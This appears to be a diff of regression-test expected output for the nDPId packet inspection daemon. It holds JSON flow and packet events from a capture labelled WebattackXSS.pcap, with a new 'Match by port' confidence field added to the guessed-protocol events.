-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588036,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347588270,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347588270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347588270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nX9AAD4GKFGsEAABwKgKMuWuAFBMCdiIAAAAAKACchANQQAAAgQFtAQCCAoBO0X3AAAAAAEDAwc="}
@@ -2066,19 +2066,19 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347597121,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xm5AAD4GZ2KsEAABwKgKMuYMAFDbqxDyAAAAAKACchA8MgAAAgQFtAQCCAoBO06cAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":2,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347597121,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5gw3EDJr26sQ86AScSCvnwAAAgQFtAQCCAoD5SARATtOnAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":3,"flow_last_seen":1499347597122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347597122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Xm9AAD4GZ2msEAABwKgKMuYMAFDbqxDzNxAybIAQAOVOpwAAAQEICgE7TpwD5SAR"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598142,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347598383,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347598383,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347598383,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jLdAAD4GORmsEAABwKgKMuYaAFCJpsNgAAAAAKACchDafwAAAgQFtAQCCAoBO0\/XAAAAAAEDAwc="}
@@ -2108,16 +2108,16 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="}
